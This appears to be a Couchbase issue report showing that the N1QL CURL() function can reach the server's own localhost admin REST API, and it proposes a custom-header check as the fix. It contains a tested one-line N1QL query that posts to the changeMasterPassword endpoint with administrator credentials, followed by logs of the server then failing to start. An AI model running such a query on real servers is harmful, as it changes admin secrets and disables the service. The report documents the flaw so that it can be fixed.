Check for N1QL CURL custom header, and reject request with failed authorization message.

Attack scenario : Under what context is CURL running on the server? Can I use CURL with REST API call to reset administrator password?

Use custom header for N1QL-CURL  : X-N1QL-User-Agent: couchbase/n1ql/1.7.0-N1QL

Each localhost endpoint can manually check for this header string and disable access on their end. 

Tested the following : 

cbq> select curl("http://Administrator:password@127.0.0.1:8091/node/controller/changeMasterPassword", {"data":"newPassword=booyaa","request":"POST"}) ;

{

    "requestID": "9aab0709-3c7a-4167-909a-0438294fc4dd",

    "signature": {

        "$1": "object"

    },

    "results": [

        {

            "$1": null

        }

    ],

    "status": "success",

    "metrics": {

        "elapsedTime": "15.852872ms",

        "executionTime": "15.836674ms",

        "resultCount": 1,

        "resultSize": 34

    }

} 

This should not be authorized.

If I quit Couchbase and then restart it, it gives error message saying

"Problem Running Couchbase : Couchbase server doesn’t seem to be operating properly. Check console logs for more details. "

When I see the logs in babysitter.log 

ns_server:debug,2017-04-19T15:37:13.155-07:00,[babysitter_of_ns_1@127.0.0.1Sending password to gosecrets

ns_server:error,2017-04-19T15:37:13.168-07:00,[babysitter_of_ns_1@127.0.0.1Incorrect master password. Error: {error,

                                      "cipher: message authentication failed"}